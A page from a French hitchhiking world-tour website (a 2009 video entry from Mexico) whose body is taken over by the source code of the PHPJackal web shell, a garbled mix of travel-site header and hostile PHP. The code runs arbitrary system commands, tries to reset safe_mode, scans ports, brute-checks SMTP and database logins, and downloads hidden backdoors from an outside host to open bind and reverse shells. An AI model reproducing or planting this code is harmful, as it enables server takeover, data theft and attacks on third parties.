Accueil | Préparatifs | Présentation | Tour du monde | Interview | Coin des écoles | Sponsoring |
Tour du monde en autostop - Jeremy Marie

Partenaire







Vidéo

Reforma, MEXIQUE
13/06/2009

$value)$_REQUEST[$key]=stripslashes($value); } if(count($IP) && !in_array($_SERVER['REMOTE_ADDR'],$IP))die('Access denied!'); function hlinK($str=''){ $myvars=array('modE','chmoD','workingdiR','urL','cracK','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); $ret=$_SERVER['PHP_SELF'].'?'; $new=explode('&',$str); foreach($_GET as $key => $v){ $add=1; foreach($new as $m){ $el=explode('=',$m); if($el[0]==$key)$add=0; } if($add){if(!in_array($key,$myvars))$ret.="$key=$v&";} } $ret.=$str; return $ret; } header('Cache-Control: no-cache, must-revalidate'); header('Expires: Mon, 7 Aug 1987 05:00:00 GMT'); $et='
'; if(!empty($login_password)){ if(!empty($_REQUEST['fpassw'])){ if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); header('Location: '.hlinK()); } if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("
Password:
$et"); } if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['workingdiR']); $disablefunctions=ini_get('disable_functions'); $disablefunctions=explode(',',$disablefunctions); function checkthisporT($ip,$port,$timeout,$type=0){ if(!$type){ $scan=fsockopen($ip,$port,$n,$s,$timeout); if($scan){fclose($scan);return 1;} } elseif(function_exists('socket_set_timeout')){ $scan=fsockopen("udp://$ip",$port); if($scan){ socket_set_timeout($scan,$timeout); fwrite($scan,"\x00"); $s=time(); fread($scan,1); if((time()-$s)>=$timeout){fclose($scan);return 1;} } } return 0; } if(!function_exists('is_executable')){ function is_executable($addr){ return 0; } } if(!function_exists('file_get_contents')){ function file_get_contents($addr){ $a=fopen($addr,'r'); $tmp=fread($a,filesize($a)); fclose($a); if($a)return $tmp;else return null; } } if(!function_exists('file_put_contents')){ function file_put_contents($addr,$con){ $a=fopen($addr,'w'); if(!$a)return 0; $t=fwrite($a,$con); fclose($a); if($t)return strlen($con); return 0; } } function file_add_contentS($addr,$con){ $a=fopen($addr,'a'); if(!$a)return 0; fwrite($a,$con); fclose($a); return strlen($con); } if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']); if(!empty($_REQUEST['downloaD'])){ ob_clean(); $dl=$_REQUEST['downloaD']; $con=file_get_contents($dl); header('Content-type: application/octet-stream'); header("Content-disposition: attachment; filename=\"$dl\";"); header('Content-length: '.strlen($con)); echo $con; exit; } if(!empty($_REQUEST['imagE'])){ $img=$_REQUEST['imagE']; header('Content-type: image/gif'); header("Content-length: ".filesize($img)); header("Last-Modified: ".date('r',filemtime($img))); echo file_get_contents($img); exit; } if(!empty($_REQUEST['exT'])){ $ex=$_REQUEST['exT']; $e=get_extension_funcs($ex); echo ''.htmlspecialchars($ex).'Functions:
';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo 'DISABLED';echo '
';} echo ''; exit; } function showsizE($size){ if($size>=1073741824)$size=round(($size/1073741824),2).' GB'; elseif($size>=1048576)$size=round(($size/1048576),2).' MB'; elseif($size>=1024)$size=round(($size/1024),2).' KB'; else $size.=' B'; return $size; } $windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0; $errorbox="
Error: "; $v='2.0'; $cwd=getcwd(); $msgbox="
"; $intro="
Script:
".str_repeat('-=-',25)."
Name: PHPJackal
Version: $v

Author:
".str_repeat('-=-',25)."
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru/
Email: nima_501@yahoo.com
$et"; $footer="${msgbox}PHPJackal v$v - Powered By Nima Ghotbi(NetJackal)$et"; $hcwd=""; $t="
"; $crack="
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
Log $hcwd $et"; function checkfunctioN($func){ global $disablefunctions,$safemode; $safe=array('passthru','system','exec','shell_exec','popen','proc_open'); if($safemode=='ON' && in_array($func,$safe))return 0; elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1; return 0; } function whereistmP(){ $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function shelL($command){ global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command); elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command); elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } function getiT($get){ $fo=strtolower(ini_get('allow_url_fopen')); $ui=strtolower(ini_get('allow_url_include')); if($fo || $fo=='on')$con=file_get_contents($get); elseif($ui || $ui=='on'){ ob_start(); include($get); $con=ob_get_contents(); ob_end_clean(); } else{ $u=parse_url($get); $host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port']; $url=fsockopen($host,$port,$en,$es,12); fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); $tmp=$con=''; while($tmp!="\r\n")$tmp=fgets($url); while(!feof($url))$con.=fgets($url); } return $con; } function downloadiT($get,$put){ $con=getiT($get); $mk=file_put_contents($put,$con); if($mk)return 1; return 0; } function winshelL($command){ $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($command){ $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function srvshelL($command){ $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws){ $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command){ $perl=new perl(); ob_start(); $perl->eval("system('$command')"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function smtpchecK($addr,$user,$pass,$timeout){ $sock=fsockopen($addr,25,$n,$s,$timeout); if(!$sock)return -1; fread($sock,1024); fputs($sock,'ehlo '.uniqid('NJ')."\r\n"); $res=substr(fgets($sock,512),0,1); if($res!='2')return 0; fgets($sock,512);fgets($sock,512);fgets($sock,512); fputs($sock,"AUTH LOGIN\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($user)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($pass)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='235')return 0; return 1; } function mysqlchecK($host,$user,$pass,$timeout){ if(function_exists('mysql_connect')){ $l=mysql_connect($host,$user,$pass); if($l)return 1; } return 0; } function mssqlchecK($host,$user,$pass,$timeout){ if(function_exists('mssql_connect')){ $l=mssql_connect($host,$user,$pass); if($l)return 1; } return 0; } function checksmtP($host,$timeout){ $from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com'; $sock=fsockopen($host,25,$n,$s,$timeout); if(!$sock)return -1; $res=substr(fgets($sock,512),0,3); if($res!='220')return 0; fputs($sock,'HELO '.uniqid('NJ')."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"MAIL FROM: <$from>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"RCPT TO: \r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"DATA\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='354')return 0; fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; return 1; } function replace_stR($s,$h){ $ret=$h; foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret); return $ret; } function check_urL($url,$method,$search='200',$timeout=3){ $u=parse_url($url); $method=strtoupper($method); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port']; $data=(!empty($u['query']))?$u['query']:''; if(!empty($data))$data="?$data"; $sock=fsockopen($host,$port,$en,$es,$timeout); if($sock){ fputs($sock,"$method $file$data HTTP/1.0\r\n"); fputs($sock,"Host: $host\r\n"); if($method=='GET')fputs($sock,"\r\n"); elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); else return 0; if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;} while(!feof($sock)){ $res=fgets($sock); if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} } fclose($sock); } return 0; } function get_sw_namE($host,$timeout){ $sock=fsockopen($host,80,$en,$es,$timeout); if($sock){ $page=uniqid('NJ'); fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); while(!feof($sock)){ $con=fgets($sock); if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} } fclose($sock); return -1; }return 0; } function snmpchecK($ip,$com,$timeout){ $res=0; $n=chr(0x00); $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n; $sock=fsockopen("udp://$ip",161); if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout); fputs($sock,$packet); socket_set_timeout($sock,$timeout); $res=fgets($sock); fclose($sock); if($res != '')return 1;else return 0; } $safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF'; if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');} function brshelL(){ global $errorbox,$windows,$et,$hcwd; $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; $addr='http://netjackal.by.ru/br'; $error="$errorbox Can not make backdoor file, go to writeable folder.$et"; $n=uniqid('NJ_'); if(!$windows)$n=".$n"; $d=whereistmP(); $name=$d.DIRECTORY_SEPARATOR.$n; $c=($_REQUEST['C'])?1:0; if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){ $port=(int)$_REQUEST['port']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); }else{ $name=$name.'.pl'; $bd=downloadiT("$addr/winbind.p",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("perl $name $port"); } } else{ if($c){ $bd=downloadiT("$addr/bind.c",$name); if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); }else{ $bd=downloadiT("$addr/bind.p",$name); if(!$bd)echo $error;else shelL("cd $d;perl $n $port &"); echo "Backdoor is waiting for you on $port.
"; } } } elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ $ip=$_REQUEST['ip']; $port=(int)$_REQUEST['rport']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); }else{ $name=$name.'.pl'; $bd=downloadiT("$addr/winrc.p",$name); shelL("attrib +H $name"); if (!$bd)echo $error;else shelL("perl.exe $name $ip $port"); } } else{ if($c){ $bd=downloadiT("$addr/rc.c",$name); if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); }else{ $bd=downloadiT("$addr/rc.p",$name); if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &"); } } echo 'Done!';} else{echo "
Bind shell:
Port:
Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"
$hcwd$et
Reverse shell:
IP:
Port:
Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"
$hcwd$et$et";}} function showimagE($img){ echo "
";} function editoR($file){ global $errorbox,$et,$hcwd,$cwd; if(is_file($file)){ if(!is_readable($file)){echo "$errorbox File is not readable$et
";} if(!is_writeable($file)){echo "$errorbox File is not writeable$et
";} $data=file_get_contents($file); echo "
$hcwd
$et